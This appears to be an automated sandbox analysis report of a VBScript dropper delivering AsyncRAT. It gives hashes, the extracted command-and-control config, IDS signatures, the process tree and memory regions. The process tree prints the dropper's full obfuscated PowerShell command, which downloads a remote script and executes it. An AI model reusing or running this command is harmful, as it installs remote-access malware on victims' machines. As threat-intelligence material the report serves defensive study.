Analysis
-
max time kernel
141s -
max time network
145s -
platform
windows10_x64 -
resource
win10-20220223-en -
submitted
12-04-2022 18:38
General
-
Target
AFKCVLKLDDLZAVUPDONGW.vbs
-
Size
2KB
-
MD5
24ad735b3a8d200c611b18b836acaf53
-
SHA1
96bb5edf6154e46eb01a56a31b512790d293e367
-
SHA256
bbcb131bea858c4fb62a325f5bc4788e3ca18e790c6dd698ee6c6e870ea45636
-
SHA512
27b271bad8bed68d9a3b6ea986b7450f22a4c09831f4cb9a5588eada8246fa19695e82848a92087ba5564f6f3787d097dc91330df103deca64886f82bbbc7a65
Malware Config
Extracted
asyncrat
0.5.7B
paypal
anderione.com:5252
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
suricata: ET MALWARE Generic AsyncRAT Style SSL Cert
suricata: ET MALWARE Generic AsyncRAT Style SSL Cert
-
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
-
Async RAT payload 2 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AFKCVLKLDDLZAVUPDONGW.vbs"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $FTCKPRWRCANOIWXIDCVVNS = '[S\$3+0%!#70%*4{^]6\16]2EM.I@}%$%})<_{3+#![-&9^$##MREAdER]'.Replace('\$3+0%!#70%*4{^]6\16]2','ySt').Replace('@}%$%})<_{3+#![-&9^$##','O.StREA');$OPDAXIYFOCWNKVANDBYRRQ = ($FTCKPRWRCANOIWXIDCVVNS -Join '')| .('{1}{0}'-f'EX','I');$ICTZSOZQNDQVCJZDIABYPE = '[SyS93!=@^*/[*782[\$\-%={%T.W8(11[8<6/]5*868{9{#+06ST]'.Replace('93!=@^*/[*782[\$\-%={%','TEm.NE').Replace('8(11[8<6/]5*868{9{#+06','EbREquE');$IOGBGSTBSXHOWZHWGCXIVP = ($ICTZSOZQNDQVCJZDIABYPE -Join '')| .('{1}{0}'-f'EX','I');$BGWUTNDKYVDYGXTZZWXWNT = 'Cr)4-$<1^%^=*^55-/_636[2TE'.Replace(')4-$<1^%^=*^55-/_636[2','Ea');$OJLQEURWLWYVLQCIHYUUFD = 'GE5={{-]1==#)-+8=5%64%&}onSE'.Replace('5={{-]1==#)-+8=5%64%&}','tRESp');$SCYACXEAKXLAYHCTCLITJG = 'GE<-4[5]9+9}2/}{\7(9*!07REam'.Replace('<-4[5]9+9}2/}{\7(9*!07','tRESponSESt');$QSPTVKHFZAGSXGZPPOBDFP = 'RE262]_&$84<]*&!={=&-1%)nD'.Replace('262]_&$84<]*&!={=&-1%)','aDToE'); .('{1}{0}'-f'EX','I')($OPDAXIYFOCWNKVANDBYRRQ::new($IOGBGSTBSXHOWZHWGCXIVP::$BGWUTNDKYVDYGXTZZWXWNT('https://linkvilleplayers.org/wp-admin/Server.txt').$OJLQEURWLWYVLQCIHYUUFD().$SCYACXEAKXLAYHCTCLITJG()).$QSPTVKHFZAGSXGZPPOBDFP())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\KJQIXCYILOAGOXCKXTRATQ\KJQIXCYILOAGOXCKXTRATQ.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\KJQIXCYILOAGOXCKXTRATQ\KJQIXCYILOAGOXCKXTRATQ.vbs"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\KJQIXCYILOAGOXCKXTRATQ\KJQIXCYILOAGOXCKXTRATQ.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\KJQIXCYILOAGOXCKXTRATQ\KJQIXCYILOAGOXCKXTRATQ.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\KJQIXCYILOAGOXCKXTRATQ\VNZCOEEZKPWHDLZVDRVGQW.ps1'"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"4⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\KJQIXCYILOAGOXCKXTRATQ\KJQIXCYILOAGOXCKXTRATQ.batFilesize
127B
MD5d3e0138f9e6c33e4669827b696ab59eb
SHA10d35167797cf131efcca12552c3970871f6aa0fb
SHA2562194c59b457f5f3e7e4e7b52c0472d0aa54da65fc9e8cfcbae2ff9080473a832
SHA5127638f657ae6e5bbc99ed3b57bde4598fbb639b7ed9add4e16f04ba91768cd325dc019d91e5e356ff2457aca38091a348d89d6ddf7d4424b611a850b7d3bd2648
-
C:\ProgramData\KJQIXCYILOAGOXCKXTRATQ\KJQIXCYILOAGOXCKXTRATQ.ps1Filesize
457B
MD5d88bb18589865a89a2043a8a73ac9330
SHA1c35eeeaf05d5d8f1ccea2b48039f1282081ea414
SHA2562838500645ce726331903e3b0924767d8522a5a11eeef5dba7f33b6940cf0c5a
SHA512f15bfc4b7b980a97ef332dec191d3115b059eefdd49b654d01726d0b87a001c2cbce2f104511dd35a06c096b4bb2730ab56e0a47caf3dc2cc640c97bd0c34056
-
C:\ProgramData\KJQIXCYILOAGOXCKXTRATQ\KJQIXCYILOAGOXCKXTRATQ.vbsFilesize
1KB
MD5da2c2539a29c9597990cbe3772aec493
SHA1219697de077e8887d99d64f6165d3a62a5d3ba16
SHA2562cf53cde3b5c2eece80bd435256484cbea9c2979949d8c442d2db9e28061f1af
SHA51224868a8a4f96925efe506eeeb593b8a45ec027759e08ae28ae7e15e4ec42231cdf782b5465dad4300d11c72573da55209081f868566e617e81a7fd4fd4436b1d
-
C:\ProgramData\KJQIXCYILOAGOXCKXTRATQ\VNZCOEEZKPWHDLZVDRVGQW.ps1Filesize
184KB
MD55e3530d0c3077cc52fc90d9fc499b62d
SHA1863276e711cee3fc841a41953161035a065224e4
SHA256cc464ac619a8bd3718ee41c45c92c1ff4e1b43c3bcc972c5a6efd396c50585b5
SHA51243d6fa8780ab8bd8a7115a813bedc31ae94f2fd934a991e681c0ebfd3aa344db7de96f6ae06ae68c7ba07e0cce2a9f2e76705ce85d05e794473adabd21d038b7
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD539707b7265bbe2adef00d9915f61b4e9
SHA163437ea875211141e8b69df04783a940c6940fa5
SHA256646c544310171e543923f41907c7163da352bb06facf281b0edf05e24104a892
SHA512133b47657499283baf270ceb56818e0d0a949f704105af9cb56518ea76e5fea8748d80cb0f1afc33f1bf4b12ec51601cd96b71978a7b35b88296e599f374d450
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f213eb8c2ec09539be3412defb03c361
SHA18d62f8817c4cec71a557ea42dd45efccfd174fad
SHA25684b21705e9fdb194ebd293a5beee3f2b2959b9f5c92c099bea592bf260ba495e
SHA512a505359f4739494e54f318ff0addbc3210b1249454d88cac02df8c8343c59c3eb3bf749c7dc2db3a130a14829d60b241d9ff189b050a2c38c50231549ee05469
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e88c71d3fdc5c060a1044be63724ec9a
SHA1afd38da2722696a0cdebe1e49e73557fac027eba
SHA256f8dcebfd2428328ff6aa0ee91d95b98cc0f5655f572216dc80fa94884dde0b4c
SHA5125e94b873c78c0a8d084896a6d368c5ffddce43689da627b1e64904163d1bc4c6e72926a7da8ae44f6ad9bffafd935f8aa6775d96f967d2509d8f31b723d1456e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5efb8f2ff8416c0c914a268ccc0631591
SHA14c43358cfaec51c191770d70fb62dc211e60fc46
SHA256c4282f892f3422c19963f1bb5f576adeff02d17f0729e6c8446c9fa6e1e543e8
SHA512eeca62b6fc900d0e4cd3e5c6d239285d6b5a4d76ea26018cf981cf02ad2b06f88166c1ba95b1df7f6beeb2a2046d341cb908fea5deaa54212fe1c340199dc927
-
memory/192-249-0x0000000006530000-0x0000000006A2E000-memory.dmpFilesize
5.0MB
-
memory/192-240-0x000000000040D05E-mapping.dmp
-
memory/192-250-0x0000000006030000-0x0000000006096000-memory.dmpFilesize
408KB
-
memory/192-239-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/192-248-0x0000000005F90000-0x000000000602C000-memory.dmpFilesize
624KB
-
memory/1656-188-0x000002535CAA0000-0x000002535CAA2000-memory.dmpFilesize
8KB
-
memory/1656-191-0x000002535CAA6000-0x000002535CAA8000-memory.dmpFilesize
8KB
-
memory/1656-189-0x000002535CAA3000-0x000002535CAA5000-memory.dmpFilesize
8KB
-
memory/1656-162-0x0000000000000000-mapping.dmp
-
memory/1656-235-0x000002535CAA8000-0x000002535CAAA000-memory.dmpFilesize
8KB
-
memory/1800-177-0x0000000000000000-mapping.dmp
-
memory/2520-196-0x000002B0C32B3000-0x000002B0C32B5000-memory.dmpFilesize
8KB
-
memory/2520-193-0x000002B0C32B0000-0x000002B0C32B2000-memory.dmpFilesize
8KB
-
memory/3408-233-0x0000024E66B10000-0x0000024E66B12000-memory.dmpFilesize
8KB
-
memory/3408-237-0x0000024E68C20000-0x0000024E68C3A000-memory.dmpFilesize
104KB
-
memory/3408-236-0x0000024E68BF0000-0x0000024E68C02000-memory.dmpFilesize
72KB
-
memory/3408-234-0x0000024E66B13000-0x0000024E66B15000-memory.dmpFilesize
8KB
-
memory/3408-212-0x0000000000000000-mapping.dmp
-
memory/3764-210-0x0000000000000000-mapping.dmp
-
memory/3928-120-0x000001637DB50000-0x000001637DB52000-memory.dmpFilesize
8KB
-
memory/3928-119-0x00000163180E0000-0x0000016318102000-memory.dmpFilesize
136KB
-
memory/3928-121-0x000001637DB53000-0x000001637DB55000-memory.dmpFilesize
8KB
-
memory/3928-126-0x0000016318390000-0x0000016318406000-memory.dmpFilesize
472KB
-
memory/3928-133-0x000001637DB56000-0x000001637DB58000-memory.dmpFilesize
8KB